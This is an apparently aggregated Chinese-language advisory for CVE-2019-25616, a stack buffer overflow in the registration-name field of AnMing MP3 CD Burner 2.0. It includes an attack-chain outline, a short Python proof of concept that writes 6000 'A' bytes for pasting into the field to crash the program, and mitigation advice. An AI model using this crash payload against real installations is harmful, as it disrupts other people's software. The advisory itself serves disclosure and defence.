CVE-2019-25616 CVSS 6.2 中危

CVE-2019-25616 AnMing MP3 CD Burner 缓冲区溢出漏洞

披露日期: 2026-03-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25616

漏洞类型

缓冲区溢出

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AnMing MP3 CD Burner

漏洞概述

AnMing MP3 CD Burner 2.0版本中存在严重的缓冲区溢出安全漏洞。该漏洞的根源在于应用程序在处理注册名称输入时，缺乏对数据长度的严格边界检查。本地攻击者无需进行身份认证，即可通过向注册名字段粘贴或输入一段精心构造的超长字符串（约6000字节），成功触发缓冲区溢出。这将导致应用程序发生异常崩溃，造成拒绝服务（DoS）状态，影响系统的正常可用性。

技术细节

该漏洞属于典型的基于栈的缓冲区溢出漏洞。在AnMing MP3 CD Burner 2.0软件的注册流程中，负责接收用户输入的“注册名”字段在内存栈上分配了固定大小的缓冲区。然而，开发者在编写代码时未能实施必要的数据长度校验机制，直接使用了不安全的字符串拷贝函数（如`strcpy`）来处理外部输入。这种设计缺陷使得攻击者能够向该字段注入远超缓冲区容量的数据（例如连续的6000字节字符）。当数据写入时，超出的部分会覆盖栈上的相邻内存区域，包括函数的返回地址或栈帧指针。这种破坏导致程序执行流程发生错误，进而引发异常终止。鉴于攻击向量为本地且无需用户交互，攻击者可轻易触发此漏洞，导致应用程序拒绝服务，从而影响系统的可用性。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要能够在本地运行AnMing MP3 CD Burner 2.0应用程序的设备上进行操作。

STEP 2

步骤2：构造恶意载荷

攻击者构造一个包含6000字节字符（如'A'）的超长字符串。

STEP 3

步骤3：输入并触发漏洞

攻击者打开应用程序，进入注册界面，将构造好的超长字符串粘贴到“注册名”输入框中。

STEP 4

步骤4：导致拒绝服务

应用程序因缓冲区溢出而崩溃，停止响应，达到拒绝服务的攻击效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import sys

# PoC for CVE-2019-25616 - AnMing MP3 CD Burner Buffer Overflow

# Generate a payload of 6000 bytes to trigger the crash
def create_dos_payload():
    padding = b"A" * 6000
    
    try:
        with open("cve_2019_25616_payload.txt", "wb") as f:
            f.write(padding)
        print("[+] Payload file 'cve_2019_25616_payload.txt' created successfully.")
        print("[+] To exploit: Copy the content of the file and paste it into the 'Registration Name' field.")
    except IOError as e:
        print(f"[-] Error writing file: {e}")

if __name__ == "__main__":
    create_dos_payload()

影响范围

AnMing MP3 CD Burner 2.0

防御指南

临时缓解措施

鉴于该软件可能已停止更新且无官方补丁，建议用户立即卸载AnMing MP3 CD Burner 2.0，并迁移至持续维护的开源或商业替代品。若因特殊原因必须继续使用，应在隔离环境中运行，并限制普通用户的操作权限，避免误操作导致应用崩溃影响业务连续性。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表